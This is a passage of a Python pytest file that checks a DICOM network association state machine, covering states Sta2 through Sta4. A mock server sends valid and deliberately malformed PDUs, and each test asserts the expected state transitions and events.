('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt06b(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
bad_request = a_associate_rq[:6] + b'\x00\x02' + a_associate_rq[8:]
assert len(bad_request) == len(a_associate_rq)
commands = [
('send', bad_request),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt07(self):
"""Test Sta2 + Evt7."""
# Sta2 + Evt7 -> <ignore> -> Sta2
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt7']
def test_evt08(self):
"""Test Sta2 + Evt8."""
# Sta2 + Evt8 -> <ignore> -> Sta2
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt8']
def test_evt09(self):
"""Test Sta2 + Evt9."""
# Sta2 + Evt9 -> <ignore> -> Sta2
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt9']
def test_evt10(self):
"""Test Sta2 + Evt10."""
# Sta2 + Evt10 -> AA-1 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt10', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt10']
def test_evt11(self):
"""Test Sta2 + Evt11."""
# Sta2 + Evt11 -> <ignore> -> Sta2
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt11']
def test_evt12(self):
"""Test Sta2 + Evt12."""
# Sta2 + Evt12 -> AA-1 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt12', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt12']
def test_evt13(self):
"""Test Sta2 + Evt13."""
# Sta2 + Evt13 -> AA-1 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt13', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt13']
def test_evt14(self):
"""Test Sta2 + Evt14."""
# Sta2 + Evt14 -> <ignore> -> Sta2
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt14']
def test_evt15(self):
"""Test Sta2 + Evt15."""
# Sta2 + Evt15 -> <ignore> -> Sta2
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt15']
def test_evt16(self):
"""Test Sta2 + Evt16."""
# Sta2 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt16', 'AA-2')
]
assert fsm._events[:2] == ['Evt5', 'Evt16']
def test_evt17(self):
"""Test Sta2 + Evt17."""
# Sta2 + Evt17 -> AA-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-5: Stop ARTIM timer
commands = []
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt17', 'AA-5')
]
assert fsm._events[:2] == ['Evt5', 'Evt17']
def test_evt18(self):
"""Test Sta2 + Evt18."""
# Sta2 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
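# Force an ARTIM expiry (Evt18) by giving the timer a very short timeout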
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt18']
def test_evt19(self):
"""Test Sta2 + Evt19."""
# Sta2 + Evt19 -> AA-1 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt19', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt19']
class TestState03(TestStateBase):
"""Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive."""
def test_evt01(self):
"""Test Sta3 + Evt1."""
# Sta3 + Evt1 -> <ignore> -> Sta3
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta3 + Evt2."""
# Sta3 + Evt2 -> <ignore> -> Sta3
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta3 + Evt3."""
# Sta3 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_ac),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt3', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta3 + Evt4."""
# Sta3 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rj),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt4', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta3 + Evt5."""
# Sta3 + Evt5 -> <ignore> -> Sta3
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta3 + Evt6."""
# Sta3 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt6', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta3 + Evt7."""
# Sta3 + Evt7 -> AE-7 -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
# AE-7: Send A-ASSOCIATE-AC PDU
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:3] == ['Sta2', 'Sta3', 'Sta6']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta3 + Evt8."""
# Sta3 + Evt8 -> AE-8 -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
# AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_associate('reject'))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt8', 'AE-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta3 + Evt9."""
# Sta3 + Evt9 -> <ignore> -> Sta3
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_pdata())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta3 + Evt10."""
# Sta3 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', p_data_tf),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt10', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta3 + Evt11."""
# Sta3 + Evt11 -> <ignore> -> Sta3
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(False))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta3 + Evt12."""
# Sta3 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt12', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta3 + Evt13."""
# Sta3 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt13', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta3 + Evt14."""
# Sta3 + Evt14 -> <ignore> -> Sta3
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(True))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta3 + Evt15."""
# Sta3 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_abort())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt15', 'AA-1'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta3 + Evt16."""
# Sta3 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_abort),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt16', 'AA-3')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta3 + Evt17."""
# Sta3 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('wait', 0.1),
('send', a_associate_rq),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt17', 'AA-4')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta3 + Evt18."""
# Sta3 + Evt18 -> <ignore> -> Sta3
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.5)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.2)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta3 + Evt19."""
# Sta3 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt19', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt19']
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def test_evt01(self):
"""Test Sta4 + Evt1."""
# Sta4 + Evt1 -> <ignore> -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta4 + Evt2."""
# Sta4 + Evt2 -> <ignore> -> Sta4
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt3']
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
